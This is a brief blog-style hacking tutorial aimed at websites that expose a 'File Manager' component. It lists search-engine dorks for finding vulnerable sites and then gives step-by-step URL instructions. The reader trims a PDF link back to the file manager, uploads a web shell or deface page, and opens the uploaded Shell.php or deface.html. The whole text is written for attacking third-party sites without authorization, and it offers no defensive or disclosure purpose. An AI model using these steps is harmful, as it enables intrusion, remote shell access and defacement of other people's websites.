"File Manager" ~ remote shell and deface upload vulnerability

"File Manager" ~ remote shell and deface upload vulnerability
zac+efron+2012.jpg (750×243)
Dorks : 
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Exploit : 
http://www.site.com/filemanager/index.html
Lets Start !
open google or bing and type dork 
inurl:/filemanager/userfiles/ filetype:pdf or 
inurl:/filemanager/index.html 
now select any website from search results 
after clicking on website url will be 
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now Delete keywords after filemanager
for example : 
Beforehttp://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
After http://www.site.com/filemanager/
Now find upload option there and upload your shell or deface Page there
you file will upload in userfiles directory 
To View your upload shell or file goto 
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html

This entry was posted in

    Category

    Category

    Category